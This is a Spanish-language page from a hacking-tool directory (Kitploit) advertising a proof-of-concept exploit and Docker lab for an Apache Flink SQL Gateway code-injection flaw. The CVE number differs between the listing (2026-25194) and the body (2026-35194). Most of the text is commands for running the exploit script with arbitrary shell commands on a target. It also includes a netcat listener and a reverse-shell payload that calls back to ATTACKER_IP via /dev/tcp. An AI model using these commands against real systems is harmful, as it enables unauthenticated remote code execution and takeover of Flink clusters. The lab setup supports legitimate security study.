Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/dexsemon/cve-2026-25194
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Exploit de prueba de concepto y entorno de laboratorio para CVE-2026-25194

Ver Repositorio
3hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-35194 — Inyección de código SQL en Apache Flink

Ejecución remota de código en los TaskManagers de Apache Flink mediante inyección en la generación de código SQL.

CVECVE-2026-35194
CVSS8.1 (Alta)
CWECWE-94 — Inyección de código
AfectadoFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Corregido1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Superficie de ataqueAPI REST de SQL Gateway (puerto predeterminado 8083, sin autenticación)

Inicio rápido

1. Desplegar el laboratorio vulnerable

root@kitploit:~
docker compose up -d

Espera ~30s a que el clúster se inicie. Se levantan dos servicios:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

Verifica:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. Instalar dependencias

root@kitploit:~
pip install requests

3. Explotación

Vector JSON:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

Vector LIKE:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Solo verificación de versión (sin RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Verificar RCE en TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Shell inversa

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Uso

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Aviso legal

Solo para investigación de seguridad autorizada y fines educativos.

Descargar herramienta